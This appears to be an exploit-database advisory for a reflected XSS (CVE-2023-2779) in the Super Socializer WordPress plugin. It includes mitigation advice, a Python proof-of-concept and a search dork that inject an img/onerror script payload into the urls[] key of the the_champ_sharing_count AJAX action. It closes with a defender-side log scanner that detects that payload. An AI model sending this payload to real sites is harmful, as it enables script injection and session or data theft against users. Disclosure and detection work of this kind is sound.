Vendor: Super Socializer
By: Amirhossein Bahramizadeh
CVSS: 6.1 (MEDIUM)
Vulnerability: Reflected XSS
CWE: 79
Product Name: Super Socializer
Affected Version From: 7.13.52
Affected Version To: 7.13.52
Patch Exists: YES
Related CVE: CVE-2023-2779
CPE: a:wordpress:super_socializer:7.13.52
Platforms Tested: Windows, Linux
Year: 2023

Super Socializer 7.13.52 – Reflected XSS

Version 7.13.52 of the Super Socializer plugin contains a reflected XSS vulnerability. The the_champ_sharing_count AJAX action returns the array key of the urls parameter in its response without sanitizing or escaping it, so an attacker can place JavaScript in that key. When a user visits a crafted URL containing the payload, the injected code executes in the user's browser, potentially allowing the attacker to steal sensitive information or perform unauthorized actions on behalf of the user.

Mitigation:

To mitigate this vulnerability, update to the latest version of the Super Socializer plugin. Additionally, user-supplied data should be validated and sanitized on input and escaped on output.

Exploit-DB raw data:

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# HTML payload placed in the array key of the urls parameter,
# which the plugin does not sanitize or escape
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# Form data for the request: the payload is the key of urls[...]
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload, timeout=10)

# Check whether the img tag is reflected unescaped in the response body
if vulnerable_param in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")
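
A defender-side check, added here as an example and not part of the original advisory or the plugin's code: it scans web server access-log lines for requests to the the_champ_sharing_count action whose urls[...] key decodes to HTML metacharacters. The sample log lines are constructed, and the function names and the assumption that legitimate keys never contain <, >, or quote characters are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jun/2023:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=the_champ_sharing_count&urls[0]=https://example.com/post HTTP/1.1" 200 64',
    '203.0.113.9 - - [20/Jun/2023:10:00:07 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert'
    '%28document%2Edomain%29%3E]=https://www.google.com HTTP/1.1" 200 120',
    '203.0.113.7 - - [20/Jun/2023:10:00:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat&urls[%3Cb%3E]=x HTTP/1.1" 200 12',
    '203.0.113.8 - - [20/Jun/2023:10:00:11 +0000] "GET /?urls[%3Cb%3E]=x HTTP/1.1" 200 9',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
URLS_KEY_RE = re.compile(r"^urls\[(.*)\]$", re.S)
HTML_META_RE = re.compile(r"[<>\"'`]")  # assumption: normal keys never need these


def suspicious_key(target):
    """Return the decoded urls[...] key if it carries HTML metacharacters."""
    path, _, query = target.partition("?")
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qsl(query, keep_blank_values=True)  # percent-decodes names
    if ("action", "the_champ_sharing_count") not in params:
        return None
    for name, _value in params:
        match = URLS_KEY_RE.match(name)
        if match and HTML_META_RE.search(match.group(1)):
            return match.group(1)
    return None


def find_hits(lines):
    """Return (client_ip, decoded_key) for each log line worth reviewing."""
    hits = []
    for line in lines:
        request = REQUEST_RE.match(line)
        if request:
            key = suspicious_key(request.group(2))
            if key is not None:
                hits.append((request.group(1), key))
    return hits


if __name__ == "__main__":
    for ip, key in find_hits(SAMPLE_LOG):
        print(f"{ip} sent urls[] key with markup: {key!r}")
```

Access logs record only the query string, so the same key sent in a POST body, as the script above does, is visible only where request bodies are logged or inspected (for example at a WAF).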